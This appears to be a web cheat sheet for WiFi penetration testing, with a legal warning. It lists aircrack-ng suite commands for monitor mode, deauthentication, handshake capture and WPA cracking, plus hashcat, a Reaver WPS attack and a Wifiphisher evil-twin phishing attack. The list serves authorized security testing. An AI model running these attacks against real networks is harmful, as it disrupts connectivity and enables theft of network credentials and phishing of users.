Back

WIFI PENETRATION TESTING

⚠️ LEGAL WARNING: Only test networks you own or have explicit authorization to test.

WiFi Basics

# Enable monitor mode
airmon-ng check kill
airmon-ng start wlan0

# Scan for networks
airodump-ng wlan0mon

# Capture on specific channel
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

# Deauth attack to capture handshake
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /path/to/wordlist.txt capture-01.cap

# Hashcat for WPA
hashcat -m 2500 capture.hccapx wordlist.txt

# WPS attack with Reaver
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Evil Twin with Wifiphisher
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
🤖 AI Assistant
Ask me about WiFi pentesting!